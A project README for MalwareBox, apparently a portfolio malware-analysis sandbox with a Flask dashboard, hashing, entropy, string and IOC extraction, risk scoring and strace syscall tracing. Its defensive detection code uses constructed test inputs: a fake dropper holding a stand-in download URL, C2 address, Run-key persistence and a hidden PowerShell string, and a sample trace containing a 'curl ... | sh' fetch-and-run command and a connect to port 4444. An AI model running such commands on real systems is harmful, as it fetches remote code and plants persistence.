Lovedipsingh/Malwarebox

πŸ›‘οΈ MalwareBox β€” Malware Analysis Sandbox


A Python-based malware analysis sandbox with a web dashboard for analysing suspicious files. Static analysis inspects the file without executing it; the optional strace-based dynamic monitor (Linux only) does execute the sample and records its behaviour. Built as a cybersecurity portfolio project.

[Screenshot: MalwareBox Dashboard]


✨ What It Does

Drop any suspicious file into the dashboard and MalwareBox will:

  • 🔑 Hash it: MD5, SHA-1 and SHA-256 fingerprints for VirusTotal lookups
  • 🌡️ Measure entropy: Shannon entropy above 7.2 bits per byte (8 is the maximum) suggests the file may be packed or encrypted
  • 🔍 Extract strings: pulls readable text from binary files
  • 🚩 Find IOCs: hardcoded IPs, URLs, registry keys, base64 payloads
  • ⚙️ Monitor behaviour: syscall tracing via strace (Linux only; this step executes the sample)
  • 📊 Score the risk: 0–100 risk score with detailed flags
  • 💾 Save reports: JSON reports saved automatically for every scan

🖥️ Dashboard

The web UI lets you drag & drop any file and see results instantly:

| Feature | Description |
|---|---|
| Drag & drop upload | Drop files directly onto the dashboard |
| Live progress bar | Real-time analysis progress |
| Risk score display | Colour-coded 0–100 risk rating |
| IOC panel | All indicators of compromise in one view |
| Risk flags | Plain-English explanation of every finding |
| Analysis history | All previous scans saved and accessible |

🚀 Quick Start

Requirements

  • Python 3.8+
  • Windows or Linux (dynamic analysis relies on strace, so it is available on Linux only)

Install & Run

```bash
# 1. Clone the repo
git clone https://github.com/Lovedipsingh/Malwarebox.git
cd Malwarebox

# 2. Install dependencies
pip install flask

# 3a. Launch (Windows: or simply double-click launch.bat)
launch.bat

# 3b. Launch (Linux/macOS; on macOS only static analysis works, strace is Linux-specific)
python app.py
```

Then open http://localhost:5000 in your browser.


πŸ“ Project Structure

```text
Malwarebox/
├── app.py                      # Flask web server & API
├── launch.bat                  # Windows one-click launcher
├── setup.bat                   # Windows first-time setup
├── sandbox/
│   ├── static_analyzer.py      # Core analysis engine
│   ├── dynamic_monitor.py      # Runtime syscall tracing
│   ├── network_capture.py      # Packet analysis
│   └── report_generator.py     # JSON report output
└── templates/
    └── index.html              # Web dashboard UI
```

🔬 How The Analysis Works

Static Analysis (safe: no execution)

  1. Reads the raw file bytes
  2. Computes MD5, SHA-1 and SHA-256 hashes to paste into VirusTotal (MD5 and SHA-1 are lookup keys only; they are not collision resistant, so don't rely on them for integrity)
  3. Calculates Shannon entropy: high values mean the content is likely encrypted or packed (already-compressed formats such as ZIP or JPEG also score high, so treat this as a hint, not a verdict)
  4. Extracts readable strings to surface hidden commands and paths
  5. Pattern-matches IOCs: IPs, URLs, registry keys, base64 blobs
  6. Scores risk 0–100 based on all findings
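The six static steps above (and the hash/entropy/strings/IOC bullets in "What It Does") worked end to end in Python, as an added example that is not MalwareBox's own code. The IOC regexes, score weights, the "suspicious string" list and the two sample inputs are constructed for the demo; the 7.2 entropy threshold is the one the README states.

```python
"""Static triage of a file without executing it: hashes, Shannon entropy,
printable strings, regex-based IOC extraction and a 0-100 risk score.

Added example walking the README's static pipeline; not MalwareBox's own code.
IOC regexes, weights, SUSPICIOUS and the sample bytes are assumptions made for
the demo. The 7.2 entropy threshold is the README's.
"""
import base64
import hashlib
import math
import random
import re
from collections import Counter

ENTROPY_PACKED = 7.2  # README threshold: above this the file may be packed/encrypted

# Assumed IOC patterns (not the project's own). Byte regexes so they run on raw files.
IOC_PATTERNS = {
    "ipv4": re.compile(rb"\b(?:\d{1,3}\.){3}\d{1,3}\b"),  # also hits version strings
    "url": re.compile(rb"https?://[\w\-.]+(?::\d+)?[/\w\-.?=&%]*", re.I),
    "registry_key": re.compile(rb"HK(?:LM|CU|CR|U|CC)\\[\w\\ ]+", re.I),
    "base64": re.compile(rb"(?:[A-Za-z0-9+/]{4}){6,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?"),
}
SUSPICIOUS = re.compile(r"powershell|cmd\.exe|/bin/sh|CurrentVersion\\Run", re.I)
WEIGHTS = {"ipv4": 15, "url": 25, "registry_key": 20, "base64": 15}  # assumed weights


def hashes(data: bytes) -> dict:
    """MD5/SHA-1/SHA-256 as lookup keys for services such as VirusTotal.
    MD5 and SHA-1 are fine as lookup keys but are not collision resistant."""
    return {alg: hashlib.new(alg, data).hexdigest() for alg in ("md5", "sha1", "sha256")}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant input, 8.0 for uniform random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Runs of printable ASCII at least min_len long, like the `strings` tool."""
    return [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def find_iocs(data: bytes) -> dict:
    """Deduplicated, sorted matches per IOC class; classes with no hits are omitted."""
    found = {}
    for kind, pat in IOC_PATTERNS.items():
        hits = sorted({m.group().decode("ascii", "replace") for m in pat.finditer(data)})
        if hits:
            found[kind] = hits
    return found


def score_risk(entropy: float, iocs: dict, strings: list) -> tuple:
    """Additive score capped at 100, with one plain-English flag per finding."""
    score, flags = 0, []
    if entropy > ENTROPY_PACKED:
        score += 30
        flags.append(f"entropy {entropy:.2f} > {ENTROPY_PACKED}: likely packed or encrypted "
                     "(compressed media such as JPEG/ZIP also scores high)")
    for kind, hits in iocs.items():
        score += WEIGHTS[kind]
        flags.append(f"{len(hits)} {kind} indicator(s), e.g. {hits[0]}")
    sus = [s for s in strings if SUSPICIOUS.search(s)]
    if sus:
        score += 15
        flags.append(f"{len(sus)} command/persistence string(s), e.g. {sus[0]!r}")
    return min(score, 100), flags


def analyse(data: bytes) -> dict:
    """Full static report for one file's bytes (the shape a JSON report could take)."""
    ent, strings, iocs = shannon_entropy(data), extract_strings(data), find_iocs(data)
    score, flags = score_risk(ent, iocs, strings)
    return {"hashes": hashes(data), "entropy": round(ent, 3), "strings": strings,
            "iocs": iocs, "risk_score": score, "flags": flags}


# Constructed samples: a fake dropper (plaintext IOCs followed by a pseudo-random
# "packed" section) and a harmless text file. Addresses use reserved test ranges.
B64_PAYLOAD = base64.b64encode(b"cmd.exe /c whoami /all && net user")
_rng = random.Random(1337)
SAMPLE = (
    b"MZ\x90\x00"
    b"\x00http://evil-update.example/payload.bin\x00"
    b"\x00C2=203.0.113.7\x00"
    b"\x00HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\x00"
    b"\x00" + B64_PAYLOAD + b"\x00"
    b"\x00powershell -nop -w hidden\x00"
    + bytes(_rng.getrandbits(8) for _ in range(4096))
)
BENIGN = b"Hello, world. This is a harmless text file.\n" * 20
```

Run `analyse(SAMPLE)` and the dropper scores 100 (entropy, four IOC classes and a persistence string all fire), while `analyse(BENIGN)` scores 0 with no IOCs. The entropy check is the noisiest signal: it cannot distinguish a packer from a ZIP, so in practice it is weighted as a hint and combined with the other findings, as the score does here.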

Dynamic Analysis (Linux only; this executes the sample)

  1. Runs the sample under strace
  2. Records every system call made during execution
  3. Flags dangerous calls: execve, connect, mprotect, ptrace
  4. Tracks child processes spawned by the sample
  5. Records all file system events
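The five dynamic steps above as an added Python example that is not MalwareBox's own code: it builds the strace invocation and parses the resulting trace to flag the README's four dangerous syscalls, attribute child processes to their parents and list file-system events. The flagged-call list is the README's; the trace format is strace's own `-f -tt -o` output; `SAMPLE_TRACE` is written by hand (no sample is executed), and the `timeout` wrapper is an assumption.

```python
"""Dynamic monitor helper modelled on the README's strace-based step:
build the strace command, then parse the trace for dangerous syscalls,
the process tree, network connections and file-system events.

Added example, not MalwareBox's own code. DANGEROUS is the README's list;
the parsed format is strace's `-f -tt -o` output; SAMPLE_TRACE is constructed.
"""
import re

DANGEROUS = {"execve", "connect", "mprotect", "ptrace"}          # from the README
SPAWN_CALLS = {"clone", "clone3", "fork", "vfork"}               # return the child's PID
FS_CALLS = {"open", "openat", "unlink", "unlinkat", "rename", "renameat", "mkdir", "chmod"}

# "<pid>  <hh:mm:ss.us> call(args) = ret"; any trailing errno text is ignored.
LINE_RE = re.compile(r"^(?P<pid>\d+)\s+(?P<ts>[\d:.]+)\s+(?P<call>[a-z0-9_]+)\((?P<args>.*)\)\s*=\s*(?P<ret>-?\w+)")
# With -f, a call interrupted by a child is split into "<unfinished ...>" and "<... call resumed>".
RESUMED_RE = re.compile(r"^(?P<pid>\d+)\s+[\d:.]+\s+<\.\.\. (?P<call>[a-z0-9_]+) resumed>.*=\s*(?P<ret>-?\w+)")
QUOTED_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')                  # first quoted argument
ADDR_RE = re.compile(r'htons\((\d+)\).*?inet_addr\("([\d.]+)"\)')  # connect() sockaddr_in
PROT_RE = re.compile(r"PROT_[A-Z_|]+")


def strace_command(sample_path: str, log_path: str, timeout_s: int = 60) -> list:
    """argv to run a sample under strace: -f follows children, -tt adds timestamps,
    -s 256 keeps long string args, -o writes the trace to log_path. The coreutils
    `timeout` wrapper is an assumption. The sample still runs with the tool's own
    privileges: strace observes the process, it does not contain it."""
    return ["timeout", str(timeout_s), "strace", "-f", "-tt", "-s", "256", "-o", log_path, sample_path]


def _detail(call: str, args: str) -> str:
    """Short human-readable detail for a flagged call."""
    if call == "execve":
        q = QUOTED_RE.search(args)
        return q.group(1) if q else args[:80]
    if call == "mprotect":
        p = PROT_RE.search(args)
        return p.group(0) if p else args[:80]
    return args[:80]


def parse_strace(trace: str) -> dict:
    """Walk one strace -f -tt log; return flags, process tree, network and file events."""
    procs, flags, network, files, root = {}, [], [], [], None
    for line in trace.splitlines():
        m = RESUMED_RE.match(line)
        if m:  # only the resumed half carries the return value, i.e. the child PID
            if m["call"] in SPAWN_CALLS and m["ret"].isdigit():
                procs[int(m["ret"])] = int(m["pid"])
            continue
        m = LINE_RE.match(line)
        if not m:
            continue  # signals, "+++ exited" markers, "<unfinished ...>" halves
        pid, call, args, ret = int(m["pid"]), m["call"], m["args"], m["ret"]
        root = pid if root is None else root
        procs.setdefault(pid, None)  # parent is filled in once the spawning call returns
        if call in SPAWN_CALLS and ret.isdigit():
            procs[int(ret)] = pid
        if call in DANGEROUS:
            flags.append({"pid": pid, "call": call, "detail": _detail(call, args)})
        if call == "connect":
            a = ADDR_RE.search(args)
            if a:
                network.append((a.group(2), int(a.group(1))))
        if call in FS_CALLS:
            q = QUOTED_RE.search(args)
            if q:
                if call in ("open", "openat"):
                    op = "write" if re.search(r"O_WRONLY|O_RDWR|O_CREAT", args) else "read"
                else:
                    op = call
                files.append({"pid": pid, "op": op, "path": q.group(1)})
    return {"root_pid": root, "processes": procs, "flags": flags, "network": network, "files": files}


# Constructed trace: the sample forks a shell that downloads a stage and calls home,
# while the parent installs persistence and deletes itself. Note the split clone().
SAMPLE_TRACE = """\
1234  12:00:00.000123 execve("/tmp/sample", ["/tmp/sample"], 0x7ffe3c1a2b40 /* 20 vars */) = 0
1234  12:00:00.000500 openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
1234  12:00:00.000900 mprotect(0x7f3a1c000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
1234  12:00:00.001200 clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f3a1c1b6a10 <unfinished ...>
1235  12:00:00.001300 execve("/bin/sh", ["sh", "-c", "curl http://evil-update.example/p | sh"], 0x7ffe3c1a2b40 /* 20 vars */) = 0
1234  12:00:00.001400 <... clone resumed>) = 1235
1235  12:00:00.002000 socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
1235  12:00:00.002500 connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("203.0.113.7")}, 16) = 0
1234  12:00:00.003000 openat(AT_FDCWD, "/home/user/.bashrc", O_WRONLY|O_CREAT|O_APPEND, 0644) = 4
1234  12:00:00.003500 unlink("/tmp/sample") = 0
1235  12:00:00.004000 +++ exited with 0 +++
1234  12:00:00.004100 --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=1235, si_uid=1000, si_status=0} ---
1234  12:00:00.004500 +++ exited with 0 +++
"""
```

Two caveats matter when reading the flags. Every dynamically linked program hits execve and mprotect during startup (the loader re-protects pages for RELRO), so those two calls need a baseline or a check for PROT_EXEC on writable memory before they mean anything. And the `<unfinished ...>` / `<... resumed>` split is the normal way strace -f reports a fork whose child starts first; a parser that only reads complete lines would leave the child unattributed.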

⚠️ Safety Notice

Always run this tool inside an isolated VM or container.
Never analyse real malware on your host machine.
Dynamic analysis actually executes the sample. strace only observes the process, it does not contain it, so the sample runs with the same privileges, file access and network reach as the user who launched MalwareBox. Snapshot the VM before a run and revert it afterwards.


πŸ—ΊοΈ Roadmap

  • VirusTotal API integration
  • YARA rule scanning
  • Docker container support
  • PDF report export
  • MITRE ATT&CK technique tagging

📄 License

MIT License: free to use and modify.


Built by Lovedip Singh
